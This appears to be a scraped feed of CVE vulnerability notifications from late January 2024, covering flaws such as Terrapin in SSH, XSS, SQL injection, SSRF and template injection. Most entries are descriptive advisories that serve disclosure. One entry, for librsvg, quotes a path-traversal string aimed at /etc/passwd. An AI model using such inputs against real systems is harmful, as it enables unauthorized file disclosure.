🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-01-25 03:37:24 |
🚨 CVE-2024-0625The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-01-25 02:37:30 |
🚨 CVE-2021-36539Instructure Canvas LMS didn't properly deny access to locked/unpublished files when the unprivileged user access the DocViewer based file preview URL (canvadoc_session_url).🎖@cveNotify |
|
| 2024-01-25 02:37:26 |
🚨 CVE-2012-4406OpenStack Object Storage (swift) before 1.7.0 uses the loads function in the pickle Python module unsafely when storing and loading metadata in memcached, which allows remote attackers to execute arbitrary code via a crafted pickle object.🎖@cveNotify |
|
| 2024-01-25 02:37:25 |
🚨 CVE-2004-2331ColdFusion MX 6.1 and 6.1 J2EE allows local users to bypass sandbox security restrictions and obtain sensitive information by using Java reflection methods to access trusted Java objects without using the CreateObject function or cfobject tag.🎖@cveNotify |
|
| 2024-01-25 02:37:24 |
🚨 CVE-2003-0791The Script.prototype.freeze/thaw functionality in Mozilla 1.4 and earlier allows attackers to execute native methods by modifying the string used as input to the script.thaw JavaScript function, which is then deserialized and executed.🎖@cveNotify |
|
| 2024-01-25 02:07:32 |
🚨 CVE-2024-23387FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.🎖@cveNotify |
|
| 2024-01-25 02:07:26 |
🚨 CVE-2023-5131A heap buffer-overflow exists in Delta Electronics ISPSoft. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DVP file to achieve code execution.🎖@cveNotify |
|
| 2024-01-25 02:07:25 |
🚨 CVE-2024-23525The Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.🎖@cveNotify |
|
| 2024-01-25 02:07:24 |
🚨 CVE-2023-22527A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.🎖@cveNotify |
|
| 2024-01-25 01:37:25 |
🚨 CVE-2024-0649A vulnerability was found in ZhiHuiYun up to 4.4.13 and classified as critical. This issue affects the function download_network_image of the file /app/Http/Controllers/ImageController.php of the component Search. The manipulation of the argument url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251375.🎖@cveNotify |
|
| 2024-01-25 01:37:24 |
🚨 CVE-2023-44077Studio Network Solutions ShareBrowser before 7.0 on macOS mishandles signature verification, aka PMP-2636.🎖@cveNotify |
|
| 2024-01-24 22:37:25 |
🚨 CVE-2023-48197Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function.🎖@cveNotify |
|
| 2024-01-24 22:37:24 |
🚨 CVE-2023-32721A stored XSS has been found in the Zabbix web application in the Maps element if a URL field is set with spaces before URL.🎖@cveNotify |
|
| 2024-01-24 22:07:25 |
🚨 CVE-2023-35020IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.🎖@cveNotify |
|
| 2024-01-24 22:07:24 |
🚨 CVE-2024-22317IBM App Connect Enterprise 11.0.0.1 through 11.0.0.24 and 12.0.1.0 through 12.0.11.0 could allow a remote attacker to obtain sensitive information or cause a denial of service due to improper restriction of excessive authentication attempts. IBM X-Force ID: 279143.🎖@cveNotify |
|
| 2024-01-24 21:37:32 |
🚨 CVE-2023-38738IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594.🎖@cveNotify |
|
| 2024-01-24 21:37:25 |
🚨 CVE-2023-43786A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.🎖@cveNotify |
|
| 2024-01-24 21:37:24 |
🚨 CVE-2014-9485Directory traversal vulnerability in the do_extract_currentfile function in miniunz.c in miniunzip in minizip before 1.1-5 might allow remote attackers to write to arbitrary files via a crafted entry in a ZIP archive.🎖@cveNotify |
|
| 2024-01-24 21:07:33 |
🚨 CVE-2023-48354In telephone service, there is a possible improper input validation. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2024-01-24 21:07:26 |
🚨 CVE-2023-6549Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service🎖@cveNotify |
|
| 2024-01-24 21:07:25 |
🚨 CVE-2024-0641A denial of service vulnerability was found in tipc_crypto_key_revoke in net/tipc/crypto.c in the Linux kernel’s TIPC subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.🎖@cveNotify |
|
| 2024-01-24 20:37:25 |
🚨 CVE-2024-0557A vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-24 20:37:24 |
🚨 CVE-2023-43898Nothings stb 2.28 was discovered to contain a Null Pointer Dereference via the function stbi__convert_format. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted pic file.🎖@cveNotify |
|
| 2024-01-24 20:07:32 |
🚨 CVE-2021-42146An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers allow remote attackers to reuse the same epoch number within two times the TCP maximum segment lifetime, which is prohibited in RFC6347. This vulnerability allows remote attackers to obtain sensitive application (data of connected clients).🎖@cveNotify |
|
| 2024-01-24 20:07:25 |
🚨 CVE-2023-25295A Cross Site Scripting (XSS) vulnerability in evewa3ajax.php in GRUEN eVEWA3 Community 31 through 53 allows attackers to obtain escalated privileges via a crafted request to the login panel.🎖@cveNotify |
|
| 2024-01-24 20:07:24 |
🚨 CVE-2023-25613An LDAP Injection vulnerability exists in the LdapIdentityBackend of Apache Kerby before 2.0.3.🎖@cveNotify |
|
| 2024-01-24 19:37:32 |
🚨 CVE-2024-23675In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.🎖@cveNotify |
|
| 2024-01-24 19:37:25 |
🚨 CVE-2024-0643Unrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload different file extensions without any restrictions, resulting in a full system compromise.🎖@cveNotify |
|
| 2024-01-24 19:37:24 |
🚨 CVE-2024-0642Inadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to lack of proper credential management.🎖@cveNotify |
|
| 2024-01-24 18:37:32 |
🚨 CVE-2024-22192Ursa is a cryptographic library for use with blockchains. The revocation scheme that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model. Notably, a malicious verifier may be able to generate a unique identifier for a holder providing a verifiable presentation that includes a Non-Revocation proof. The impact of the flaw is that a malicious verifier may be able to determine a unique identifier for a holder presenting a Non-Revocation proof. Ursa has moved to end-of-life status and no fix is expected.🎖@cveNotify |
|
| 2024-01-24 18:37:26 |
🚨 CVE-2024-22191Avo is a framework to create admin panels for Ruby on Rails apps. A stored cross-site scripting (XSS) vulnerability was found in the key_value field of Avo v3.2.3 and v2.46.0. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser. The value of the key_value is inserted directly into the HTML code. In the current version of Avo (possibly also older versions), the value is not properly sanitized before it is inserted into the HTML code. This vulnerability could be used to steal sensitive information from victims that could be used to hijack victims' accounts or redirect them to malicious websites. Avo 3.2.4 and 2.47.0 include a fix for this issue. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-01-24 18:37:25 |
🚨 CVE-2023-6147Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the response data🎖@cveNotify |
|
| 2024-01-24 18:37:24 |
🚨 CVE-2020-36641A vulnerability classified as problematic was found in gturri aXMLRPC up to 1.12.0. This vulnerability affects the function ResponseParser of the file src/main/java/de/timroes/axmlrpc/ResponseParser.java. The manipulation leads to xml external entity reference. Upgrading to version 1.12.1 is able to address this issue. The patch is identified as ad6615b3ec41353e614f6ea5fdd5b046442a832b. It is recommended to upgrade the affected component. VDB-217450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-24 18:07:25 |
🚨 CVE-2024-0647A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-24 18:07:24 |
🚨 CVE-2022-41786Missing Authorization vulnerability in WP Job Portal WP Job Portal – A Complete Job Board.This issue affects WP Job Portal – A Complete Job Board: from n/a through 2.0.1.🎖@cveNotify |
|
| 2024-01-24 17:37:32 |
🚨 CVE-2023-51885Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component.🎖@cveNotify |
|
| 2024-01-24 17:37:25 |
🚨 CVE-2022-3739The WP Best Quiz WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-01-24 17:37:24 |
🚨 CVE-2023-51804An issue in rymcu forest v.0.02 allows a remote attacker to obtain sensitive information via manipulation of the HTTP body URL in the com.rymcu.forest.web.api.common.UploadController file.🎖@cveNotify |
|
| 2024-01-24 17:07:37 |
🚨 CVE-2024-22408Shopware is an open headless commerce platform. The implemented Flow Builder functionality in the Shopware application does not adequately validate the URL used when creating the “call webhook” action. This enables malicious users to perform web requests to internal hosts. This issue has been fixed in the Commercial Plugin release 6.5.7.4 or with the Security Plugin. For installations with Shopware 6.4 the Security plugin is recommended to be installed and up to date. For older versions of 6.4 and 6.5 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.🎖@cveNotify |
|
| 2024-01-24 17:07:36 |
🚨 CVE-2024-22407Shopware is an open headless commerce platform. In the Shopware CMS, the state handler for orders fails to sufficiently verify user authorizations for actions that modify the payment, delivery, and/or order status. Due to this inadequate implementation, users lacking 'write' permissions for orders are still able to change the order state. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.🎖@cveNotify |
|
| 2024-01-24 17:07:35 |
🚨 CVE-2024-22916In D-LINK Go-RT-AC750 v101b03, the sprintf function in the sub_40E700 function within the cgibin is susceptible to stack overflow.🎖@cveNotify |
|
| 2024-01-24 17:07:31 |
🚨 CVE-2023-7234OPCUAServerToolkit will write a log message once an OPC UA client has successfully connected containing the client's self-defined description field.🎖@cveNotify |
|
| 2024-01-24 17:07:30 |
🚨 CVE-2024-0483A vulnerability classified as critical was found in Taokeyun up to 1.0.5. This vulnerability affects the function index of the file application/index/controller/app/Task.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250588.🎖@cveNotify |
|
| 2024-01-24 17:07:26 |
🚨 CVE-2024-0482A vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587.🎖@cveNotify |
|
| 2024-01-24 17:07:25 |
🚨 CVE-2024-0479A vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584.🎖@cveNotify |
|
| 2024-01-24 17:07:24 |
🚨 CVE-2023-38633A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by href=".?../../../../../../../../../../etc/passwd" in an xi:include element.🎖@cveNotify |
|
| 2024-01-24 16:37:30 |
🚨 CVE-2024-22725Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server's error reporting.🎖@cveNotify |
|
| 2024-01-24 16:37:26 |
🚨 CVE-2024-22651There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04.🎖@cveNotify |
|
| 2024-01-24 16:37:25 |
🚨 CVE-2023-50919An issue was discovered on GL.iNet devices before version 4.5.0. There is an NGINX authentication bypass via Lua string pattern matching. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.🎖@cveNotify |
|
| 2024-01-24 16:07:25 |
🚨 CVE-2022-3836The Seed Social WordPress plugin before 2.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-01-24 16:07:24 |
🚨 CVE-2022-3194The Dokan WordPress plugin before 3.6.4 allows vendors to inject arbitrary javascript in product reviews, which may allow them to run stored XSS attacks against other users like site administrators.🎖@cveNotify |
|
| 2024-01-24 15:37:32 |
🚨 CVE-2023-51702Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster.This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue.🎖@cveNotify |
|
| 2024-01-24 15:37:26 |
🚨 CVE-2023-50944Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.🎖@cveNotify |
|
| 2024-01-24 15:37:25 |
🚨 CVE-2022-2413The Slide Anything WordPress plugin before 2.3.47 does not properly sanitize or escape the slide title before outputting it in the admin pages, allowing a logged in user with roles as low as Author to inject a javascript payload into the slide title even when the unfiltered_html capability is disabled.🎖@cveNotify |
|
| 2024-01-24 15:37:24 |
🚨 CVE-2023-22527A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.🎖@cveNotify |
|
| 2024-01-24 15:07:24 |
🚨 CVE-2023-0094The UpQode Google Maps WordPress plugin through 1.0.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-01-24 14:37:26 |
🚨 CVE-2023-6697The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-24 14:37:25 |
🚨 CVE-2024-0569A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-24 14:37:24 |
🚨 CVE-2023-51805SQL Injection vulnerability in TDuckCLoud tduck-platform v.4.0 allows a remote attacker to obtain sensitive information via the getFormKey parameter in the search function of FormDataMysqlService.java file.🎖@cveNotify |
|
| 2024-01-24 14:07:38 |
🚨 CVE-2023-38627A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is a similar, but not identical vulnerability as CVE-2023-38626.🎖@cveNotify |
|
| 2024-01-24 14:07:31 |
🚨 CVE-2023-38624A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is a similar, but not identical vulnerability as CVE-2023-38625 through CVE-2023-38627.🎖@cveNotify |
|
| 2024-01-24 14:07:30 |
🚨 CVE-2023-6926There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access.🎖@cveNotify |
|
| 2024-01-24 14:07:26 |
🚨 CVE-2023-42143Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware.🎖@cveNotify |
|
| 2024-01-24 14:07:25 |
🚨 CVE-2022-1618The Coru LFMember WordPress plugin through 1.0.2 does not have CSRF check in place when adding a new game, and is lacking sanitisation as well as escaping in their settings, allowing attacker to make a logged in admin add an arbitrary game with XSS payloads🎖@cveNotify |
|
| 2024-01-24 13:37:25 |
🚨 CVE-2023-50944Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.🎖@cveNotify |
|
| 2024-01-24 13:37:24 |
🚨 CVE-2023-50943Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of "enable_xcom_pickling=False" configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue.🎖@cveNotify |
|
| 2024-01-24 12:37:32 |
🚨 CVE-2024-22309Deserialization of Untrusted Data vulnerability in QuantumCloud ChatBot with AI.This issue affects ChatBot with AI: from n/a through 5.1.0.🎖@cveNotify |
|
| 2024-01-24 12:37:31 |
🚨 CVE-2024-22301Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ignazio Scimone Albo Pretorio On line.This issue affects Albo Pretorio On line: from n/a through 4.6.6.🎖@cveNotify |
|
| 2024-01-24 12:37:30 |
🚨 CVE-2024-22294Exposure of Sensitive Information to an Unauthorized Actor vulnerability in IP2Location IP2Location Country Blocker.This issue affects IP2Location Country Blocker: from n/a through 2.33.3.🎖@cveNotify |
|
| 2024-01-24 12:37:27 |
🚨 CVE-2024-22152Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce.This issue affects Product Import Export for WooCommerce: from n/a through 2.3.7.🎖@cveNotify |
|
| 2024-01-24 12:37:26 |
🚨 CVE-2024-22134Server-Side Request Forgery (SSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70.🎖@cveNotify |
|
| 2024-01-24 12:37:25 |
🚨 CVE-2023-52221Unrestricted Upload of File with Dangerous Type vulnerability in UkrSolution Barcode Scanner and Inventory manager.This issue affects Barcode Scanner and Inventory manager: from n/a through 1.5.1.🎖@cveNotify |
|
| 2024-01-24 10:37:37 |
🚨 CVE-2024-0854URL redirection to untrusted site ('Open Redirect') vulnerability in file access component in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors.🎖@cveNotify |
|
| 2024-01-24 10:37:36 |
🚨 CVE-2023-43999An issue in COLORFUL_laundry mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:35 |
🚨 CVE-2023-43998An issue in Books-futaba mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:32 |
🚨 CVE-2023-43997An issue in Yoruichi hobby base mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:31 |
🚨 CVE-2023-43994An issue in Cleaning_makotoya mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:30 |
🚨 CVE-2023-43993An issue in smaregi_app_market mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:27 |
🚨 CVE-2023-43992An issue in STOCKMAN GROUP mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:26 |
🚨 CVE-2023-43991An issue in PRIMA CLINIC mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:25 |
🚨 CVE-2023-43989An issue in mokumoku chohu mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 10:37:24 |
🚨 CVE-2023-43988An issue in nature fitness saijo mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-24 08:37:25 |
🚨 CVE-2024-0665The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-24 08:37:24 |
🚨 CVE-2023-47350Cross-Site Request Forgery (CSRF) vulnerability in SwiftyEdit Content Management System prior to v1.2.0, allows remote attackers to escalate privileges via the user password update functionality.🎖@cveNotify |
|
| 2024-01-24 07:37:25 |
🚨 CVE-2023-43317An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component.🎖@cveNotify |
|
| 2024-01-24 07:37:24 |
🚨 CVE-2024-23726Ubee DDW365 XCNDDW365 devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.🎖@cveNotify |
|
| 2024-01-24 05:37:43 |
🚨 CVE-2024-22366Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier.🎖@cveNotify |
|
| 2024-01-24 05:37:36 |
🚨 CVE-2021-33621The cgi gem before 0.1.0.2, 0.2.x before 0.2.2, and 0.3.x before 0.3.5 for Ruby allows HTTP response splitting. This is relevant to applications that use untrusted user input either to generate an HTTP response or to create a CGI::Cookie object.🎖@cveNotify |
|
| 2024-01-24 05:37:35 |
🚨 CVE-2022-28739There is a buffer over-read in Ruby before 2.6.10, 2.7.x before 2.7.6, 3.x before 3.0.4, and 3.1.x before 3.1.2. It occurs in String-to-Float conversion, including Kernel#Float and String#to_f.🎖@cveNotify |
|
| 2024-01-24 05:37:31 |
🚨 CVE-2021-41816CGI.escape_html in Ruby before 2.7.5 and 3.x before 3.0.3 has an integer overflow and resultant buffer overflow via a long string on platforms (such as Windows) where size_t and long have different numbers of bytes. This also affects the CGI gem before 0.3.1 for Ruby.🎖@cveNotify |
|
| 2024-01-24 05:37:30 |
🚨 CVE-2021-33481A stack-based buffer overflow vulnerability was discovered in gocr through 0.53-20200802 in try_to_divide_boxes() in pgm2asc.c.🎖@cveNotify |
|
| 2024-01-24 05:37:26 |
🚨 CVE-2021-33480An use-after-free vulnerability was discovered in gocr through 0.53-20200802 in context_correction() in pgm2asc.c.🎖@cveNotify |
|
| 2024-01-24 05:37:25 |
🚨 CVE-2020-25613An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.🎖@cveNotify |
|
| 2024-01-24 03:37:32 |
🚨 CVE-2023-31037NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS.🎖@cveNotify |
|
| 2024-01-24 03:37:26 |
🚨 CVE-2023-51257An invalid memory write issue in Jasper-Software Jasper v.4.1.1 and before allows a local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-01-24 03:37:25 |
🚨 CVE-2023-5341A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.🎖@cveNotify |
|
| 2024-01-24 03:37:24 |
🚨 CVE-2022-48541A memory leak in ImageMagick 7.0.10-45 and 6.9.11-22 allows remote attackers to perform a denial of service via the "identify -help" command.🎖@cveNotify |
|
| 2024-01-24 02:37:25 |
🚨 CVE-2024-21796Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2024-01-24 02:37:24 |
